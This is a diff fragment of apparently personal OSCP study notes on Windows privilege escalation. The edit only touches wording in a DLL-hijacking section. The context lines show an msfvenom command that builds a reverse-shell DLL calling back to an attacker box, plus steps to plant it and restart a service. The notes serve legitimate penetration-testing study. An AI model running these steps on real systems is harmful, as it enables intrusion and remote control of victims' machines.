krovs/oscp-notes/docs/15_windows_privesc.md

 type 'C:\FileZilla\FileZilla FTP Client\test.txt'
 ```

-Using Process Monitor, identify all DLLs loaded by the selected app as well as detect missing ones and try to replace one with a malicious file.
+Using Process Monitor, identify all DLLs loaded by the selected app as well as detect missing ones, and try to replace one with a malicious file.

 ```shell
 msfvenom -p windows/x64/shell_reverse_tcp LHOST=<attack_box> LPORT=<lport> -f dll -o reverse.dll
 ```

-Transfer the malicious dll to the path and restart the service.
+Transfer the malicious DLL to the path and restart the service.

 ```shell
 sc stop <service>